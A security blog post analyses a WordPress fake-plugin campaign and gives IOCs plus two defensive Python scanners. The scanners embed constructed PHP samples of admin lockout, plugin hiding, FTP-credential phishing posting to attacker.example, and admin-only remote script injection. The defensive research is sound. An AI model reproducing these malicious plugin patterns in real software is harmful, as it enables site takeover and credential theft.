JANUARY 14, 2026

Analyzing the 'Fake Browser Updates plugin' Campaign: A Deeper Dive

Sucuri recently published an excellent analysis of a pervasive campaign that plants a malicious "fake plugin" on WordPress sites. Once installed on a compromised site, the plugin injects code that renders fake browser update pages to WordPress administrators. As a follow-up to their initial report, I pulled on some of the published indicators of compromise (IOCs), specifically the IP addresses involved and the other malicious payloads those same IPs were distributing at the time.

The Threat Vector: Fake modern-recent-posts & compromised credentials

The core of this attack relies on compromised credentials (harvested from large leaked credential databases) to install a seemingly legitimate but malicious plugin. As reported by Sucuri, once active the plugin downloads and executes JavaScript from persistancejs[.]store, and that payload is served ONLY to logged-in WordPress Administrators; ordinary visitors and lower-privileged users never see it. The fake plugin also inspects the User-Agent header to decide which payload variant to show the victim.


Once the payload is acquired, the fake plugin renders a fake browser update page inside the WordPress admin interface, telling the victim to update Java. Clicking the button downloads installer.exe from the malicious site secure-java-update[.]com; running it infects the victim's Windows computer with a Remote Access Trojan (RAT).

Fortunately, at the time of writing the domain secure-java-update[.]com has already been taken down.

Tracking the Attack Infrastructure

Leveraging our Threat Shield technology, which gives us unique traceability over actions performed within the PHP engine, I was able to observe the traffic originating from the initially identified IPs, along with several previously unassociated but clearly related fake plugins that those IPs were also pushing.

IP Address Analysis and Observed Activity

The following summarizes the key IP addresses observed during the analysis period, the plugin files and paths they wrote, and the SHA256 hashes of the files recovered from each:

IP Addresses
  • 195[.]133[.]44[.]149
  • 185[.]177[.]59[.]104

Files and Paths
  • /modern-recent-posts/modern-recent-posts.php
  • /modern-recent-posts/plugin.php
  • /modern-recent-posts.zip

SHA256 Signatures
Three variations of the fake plugin:
  • aaa24f63542c0653c9bf9e1e5e3d92519f3a3919d856fb9760a183dbfe995a9f
  • a0739733f0d6b581d29c74a6777810c871d7064259fbb516c741041965668062
  • 098c743376ef48a5b39357237a3aea595c6c1359b0b596e2a60a44b724113b65
plugin.php:
  • aaa24f63542c0653c9bf9e1e5e3d92519f3a3919d856fb9760a183dbfe995a9f
Two variations of the ZIP file:
  • 380192edfa13192c466dd733e2dc974cefd32b8e213b728c8e624528670215b3
  • 1409f75212779e24c25419cc58cf75c89b195ae53e0fd078a117600db8e2ee2c

Beyond the Plugin: The Secondary Payload Menagerie

What's particularly concerning is that the infrastructure pushing the "fake plugin" isn't dedicated to this campaign alone. The same IPs are multi-tasking, acting as launchpads for a variety of other fake plugins, which I describe below:

secwp or wpsecurity

This other fake plugin has two variations. The first neither steals credentials nor shows fake updates; instead it injects into the website footer links to online black markets (usually referred to as darknet markets) such as Silk Road, the first major market of that kind to emerge.

The second variation I found is more dangerous: it can lock the legitimate administrator out of the site and trick them into handing their FTP/server credentials to an external attacker. Let's review each capability further.

Locking the Administrator (The "Lockout")

The script strips the site administrator of almost all of their powers:

  • Capability stripping: filter_user_caps sets almost every important capability (install_plugins, edit_themes, manage_options and others) to false, so the account keeps its Administrator role but can no longer act on it.
  • Redirect loop: redirect_admin_to_security_page forces the admin away from every useful dashboard page and onto a fake "Security Update" page.
  • Password protection: block_admin_password_change_via_admin prevents the admin from changing their own password through wp-admin, which keeps the attacker's stolen login working.
  • Stealth: filter_all_plugins hides the plugin from the Plugins list, so you cannot see it running (or deactivate it) from the dashboard.

The Phishing Page (The "Security Update")

The script registers a fake admin menu page with the slug security_update. When the victim lands on it, they see a message: "Critical WordPress Update."

  • It calls the built-in WordPress function request_filesystem_credentials(), the same function core uses when it cannot write to the filesystem directly.
  • That renders the standard WordPress connection-information form asking for the FTP Host, Username and Password. Because it is a genuine core form rather than a lookalike, users are likely to trust it.

Data Exfiltration (The "Theft")

Once the victim submits their FTP credentials, the script forwards them to a remote server (onion[.]repair), giving the attacker full access to the web server's files.
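To turn the behaviours described above (the admin-only script injection of modern-recent-posts, and the lockout and FTP-credential phishing of the wpsecurity variant) into something you can run over a wp-content/plugins tree, here is an added triage script. It is an added example, not code from the original post, from Sucuri, or from the malware itself. It assumes the malware's named functions are attached to the usual WordPress hooks (user_has_cap, all_plugins, admin_init/admin_menu), which the post does not state, and the PHP samples inside it are constructed to mimic the descriptions, with the placeholder hosts attacker.example and payload.example standing in for the real infrastructure.

```python
"""Static triage of WordPress plugin source for the behaviours described above.
Added example (not the post's or the malware's code); the hook names are an
assumption about how the malware's named functions are wired in, and the PHP
samples at the bottom are constructed."""
import os
import re

# Hosts a plugin may legitimately contact; add the site's own hostnames here.
DEFAULT_ALLOWED_HOSTS = frozenset({"api.wordpress.org", "downloads.wordpress.org"})

# One rule per behaviour; none is malicious alone, the verdict is on combinations.
RULES = {
    "user_has_cap_filter": re.compile(r"add_filter\(\s*['\"]user_has_cap['\"]"),  # filter_user_caps
    "all_plugins_filter": re.compile(r"add_filter\(\s*['\"]all_plugins['\"]"),    # filter_all_plugins
    "redirect_to_security_update": re.compile(r"wp_(?:safe_)?redirect\([^;]*security_update"),
    "security_update_menu_page": re.compile(r"add_menu_page\([^;]*['\"]security_update['\"]"),
    "request_filesystem_credentials": re.compile(r"\brequest_filesystem_credentials\s*\("),
    "admin_gated": re.compile(r"current_user_can\(\s*['\"](?:manage_options|administrator)['\"]"),
}
# Outbound HTTP (WordPress HTTP API, curl, stream wrapper) and remote <script> sources.
OUTBOUND_HTTP = re.compile(r"(?:wp_remote_(?:post|get|request)|curl_init|file_get_contents)"
                           r"\s*\(\s*['\"]https?://([^/'\"\s]+)")
REMOTE_SCRIPT = re.compile(r"(?:wp_enqueue_script\([^;]*|<script[^>]*src=)['\"]https?://([^/'\"\s]+)[^'\"]*\.js")


def triage_plugin_source(src, allowed_hosts=DEFAULT_ALLOWED_HOSTS):
    """Return {'verdict', 'findings', 'external_hosts'} for one plugin's PHP source."""
    findings = {name for name, rx in RULES.items() if rx.search(src)}
    http_hosts = {h.lower() for h in OUTBOUND_HTTP.findall(src)} - allowed_hosts
    script_hosts = {h.lower() for h in REMOTE_SCRIPT.findall(src)} - allowed_hosts
    if http_hosts:
        findings.add("external_http")
    if script_hosts:
        findings.add("external_script")
    lockout = {"user_has_cap_filter", "all_plugins_filter"} <= findings        # caps stripped + plugin hidden
    phishing = {"request_filesystem_credentials", "external_http"} <= findings  # FTP form + exfiltration
    injector = {"admin_gated", "external_script"} <= findings                  # admin-only remote script
    if lockout or phishing or injector:
        verdict = "malicious"
    elif len(findings) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": sorted(findings),
            "external_hosts": sorted(http_hosts | script_hosts)}


def scan_plugin_dir(root, allowed_hosts=DEFAULT_ALLOWED_HOSTS):
    """Triage every .php file under a wp-content/plugins tree; returns only non-clean files."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = triage_plugin_source(fh.read(), allowed_hosts)
                if result["verdict"] != "clean":
                    report[path] = result
    return report


# Constructed sample mimicking the wpsecurity lockout/phishing variant (placeholder host).
FAKE_WPSECURITY = r"""<?php
/* Plugin Name: WP Security */
add_filter('user_has_cap', 'filter_user_caps', 10, 4);
function filter_user_caps($allcaps, $caps, $args, $user) {
    foreach (array('install_plugins', 'edit_themes', 'manage_options') as $cap) { $allcaps[$cap] = false; }
    return $allcaps;
}
add_filter('all_plugins', 'filter_all_plugins');
add_action('admin_init', 'redirect_admin_to_security_page');
function redirect_admin_to_security_page() { wp_safe_redirect(admin_url('admin.php?page=security_update')); exit; }
add_action('admin_menu', function () {
    add_menu_page('Security Update', 'Security Update', 'read', 'security_update', 'render_security_update');
});
function render_security_update() {
    $creds = request_filesystem_credentials('', '', false, false, null);
    wp_remote_post('https://attacker.example/collect', array('body' => $creds));
}
"""
# Constructed sample mimicking the admin-only injector of modern-recent-posts (placeholder host).
FAKE_RECENT_POSTS = r"""<?php
/* Plugin Name: Modern Recent Posts */
add_action('admin_footer', 'mrp_inject');
function mrp_inject() {
    if (!current_user_can('manage_options')) { return; }
    echo '<script src="https://payload.example/update.js"></script>';
}
"""
# Constructed benign sample: hooks user_has_cap like a role manager and talks only to api.wordpress.org.
BENIGN_ROLE_MANAGER = r"""<?php
/* Plugin Name: Role Tweaks */
add_filter('user_has_cap', 'role_tweaks_caps', 10, 4);
function role_tweaks_caps($allcaps, $caps, $args, $user) {
    if (in_array('editor', (array) $user->roles, true)) { $allcaps['edit_theme_options'] = true; }
    return $allcaps;
}
function role_tweaks_check_version() { return wp_remote_get('https://api.wordpress.org/core/version-check/1.7/'); }
"""
```

The point of scoring combinations is that each call on its own is legitimate: role-manager plugins hook user_has_cap, and core's own upgrader calls request_filesystem_credentials(), which is why the benign sample comes back clean. Run scan_plugin_dir('/var/www/html/wp-content/plugins') on a suspect site, treat "malicious" hits as confirmed and review anything marked "suspicious" by hand.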

Indicators of Compromise (IOCs)

The following technical data has been compiled to help security researchers and WordPress administrators identify, track and mitigate this specific threat. Below is a consolidated list of the network infrastructure, malicious domains and file signatures associated with this campaign. We recommend cross-referencing these indicators with your server logs and adding firewall blocks for the listed IP addresses to prevent further communication with the attacker's infrastructure.

IP Addresses
  • 195[.]133[.]44[.]149
  • 185[.]177[.]59[.]104

Domains
  • persistancejs[.]store (JavaScript payload for the fake update page)
  • secure-java-update[.]com (installer.exe download; taken down at the time of writing)
  • onion[.]repair (FTP credential exfiltration)

Files & Paths Observed, with SHA256 Signatures
/wpsec.php_/wpsec.php
  • a863909afe7f8eba532170aea082a46e815b2f78dde6568f54aa2b5e40672f5d
  • 3fa819e339758be3457651c7655fb74fe226b127a347e72175b4ca4ed98ab8cb
  • daaa2f77eaea83fa5c14aacb75f8d30bf2019c135967f4d84749585cd0f35326
  • f9c700eedb3469ae172c9ab45b9efb2cd25e9d008095d18b14ec7ed911ce1f23
/wpsecurity/wpsecurity.php
  • 8f180133d3b109feaef20d565fcb09781490b7a670a0c1e5663d552e927f7e57
  • 82eaa84b63fed6e3d0801a3bbfc3357e6eb73624ac525680a928d10eccc30522
wpsecurity.zip
  • df476f562e0cfc380501f4ddafdbe574e30444f9a678443a497d40c771dc2e8a
wpsec.php_.zip
  • 7f17191162150864ac8f7349da31b775e9de6e3082ef9f3ab15061676344e7ab
  • 7e7c82352b5583ee37df2ba53f51145571094e26c3c7a7e8f7599376e0cd72e7
  • 0141b290ad7d1369427d8b4d4fbbed51218a16bab5cb210994c63c86622b5da3
  • 6c6eb7b45ef9802b9175178f2bff5920724c3471cc59374d7fec826f9dd416ec

Note: the IP addresses listed above are the ones observed during this investigation. Validate them against your own threat intelligence feeds before acting on them, since attacker infrastructure rotates.
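To make the indicator lists in this post directly usable, here is an added sweep script (example code, not from the original post) that hashes every plugin file against the published SHA256 list, flags the known file paths, and picks the listed IPs, domains and paths out of access-log lines. The hashes, IPs, domains and paths are taken from this post and kept defanged in the source; the log lines at the bottom are constructed for the example, and 203.0.113.7 is a documentation address standing in for a normal visitor.

```python
"""IOC sweep for the fake-plugin campaign described in this post: hash plugin files
against the published SHA256 list and look for the listed IPs, domains and paths
in log lines.  Added example, not code from the original post; indicators are copied
from the post (defanged with [.] as there), the log lines are constructed."""
import hashlib
import os
import re


def refang(s):
    """Turn a defanged indicator such as 195[.]133[.]44[.]149 back into a matchable string."""
    return s.replace("[.]", ".")


IOC_SHA256 = {
    # modern-recent-posts: three plugin variants (plugin.php shares the first hash) and two ZIPs
    "aaa24f63542c0653c9bf9e1e5e3d92519f3a3919d856fb9760a183dbfe995a9f",
    "a0739733f0d6b581d29c74a6777810c871d7064259fbb516c741041965668062",
    "098c743376ef48a5b39357237a3aea595c6c1359b0b596e2a60a44b724113b65",
    "380192edfa13192c466dd733e2dc974cefd32b8e213b728c8e624528670215b3",
    "1409f75212779e24c25419cc58cf75c89b195ae53e0fd078a117600db8e2ee2c",
    # wpsec.php (4), wpsecurity.php (2), wpsecurity.zip (1), wpsec.php_.zip (4)
    "a863909afe7f8eba532170aea082a46e815b2f78dde6568f54aa2b5e40672f5d",
    "3fa819e339758be3457651c7655fb74fe226b127a347e72175b4ca4ed98ab8cb",
    "daaa2f77eaea83fa5c14aacb75f8d30bf2019c135967f4d84749585cd0f35326",
    "f9c700eedb3469ae172c9ab45b9efb2cd25e9d008095d18b14ec7ed911ce1f23",
    "8f180133d3b109feaef20d565fcb09781490b7a670a0c1e5663d552e927f7e57",
    "82eaa84b63fed6e3d0801a3bbfc3357e6eb73624ac525680a928d10eccc30522",
    "df476f562e0cfc380501f4ddafdbe574e30444f9a678443a497d40c771dc2e8a",
    "7f17191162150864ac8f7349da31b775e9de6e3082ef9f3ab15061676344e7ab",
    "7e7c82352b5583ee37df2ba53f51145571094e26c3c7a7e8f7599376e0cd72e7",
    "0141b290ad7d1369427d8b4d4fbbed51218a16bab5cb210994c63c86622b5da3",
    "6c6eb7b45ef9802b9175178f2bff5920724c3471cc59374d7fec826f9dd416ec",
}
IOC_IPS = {refang(ip) for ip in ("195[.]133[.]44[.]149", "185[.]177[.]59[.]104")}
IOC_DOMAINS = {refang(d) for d in ("persistancejs[.]store", "secure-java-update[.]com", "onion[.]repair")}
IOC_PATHS = ("modern-recent-posts", "wpsecurity", "wpsec.php")


def sha256_file(path):
    """Stream a file through SHA256 so large ZIPs do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def classify_file(relpath, digest):
    """Match one plugin file by hash (exact) and by path fragment (weaker: names can be reused)."""
    return {"hash_match": digest.lower() in IOC_SHA256,
            "path_match": any(frag in relpath for frag in IOC_PATHS)}


def sweep_plugins(plugins_dir):
    """Hash every .php/.zip under wp-content/plugins; returns the files with any IOC match."""
    hits = {}
    for dirpath, _, names in os.walk(plugins_dir):
        for name in names:
            if name.endswith((".php", ".zip")):
                path = os.path.join(dirpath, name)
                result = classify_file(os.path.relpath(path, plugins_dir), sha256_file(path))
                if any(result.values()):
                    hits[path] = result
    return hits


LOG_CLIENT_IP = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


def scan_log_lines(lines):
    """Return (line_no, indicator, line) for every log line touching an IOC IP, domain or path."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_CLIENT_IP.match(line)
        if m and m.group(1) in IOC_IPS:
            hits.append((n, m.group(1), line))
            continue
        for ioc in sorted(IOC_DOMAINS) + list(IOC_PATHS):
            if ioc in line:
                hits.append((n, ioc, line))
                break
    return hits


# Constructed access-log lines (Combined Log Format, abbreviated); 203.0.113.7 is a documentation address.
SAMPLE_LOG = refang("""\
195[.]133[.]44[.]149 - - [10/Jan/2026:03:12:44 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.7 - - [10/Jan/2026:03:13:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 8421
185[.]177[.]59[.]104 - - [10/Jan/2026:03:14:09 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 1190
203.0.113.7 - - [10/Jan/2026:03:15:30 +0000] "GET /wp-content/plugins/modern-recent-posts/plugin.php HTTP/1.1" 200 512
""").splitlines()
```

A hash match is exact and can be treated as confirmed; a path-only match is a lead, because a legitimate plugin could reuse one of these names. Run sweep_plugins('/var/www/html/wp-content/plugins') and scan_log_lines(open('/var/log/apache2/access.log')) on a suspect host, and feed IOC_IPS and IOC_DOMAINS from your own threat intelligence as well, since this list reflects only what was observed during the investigation.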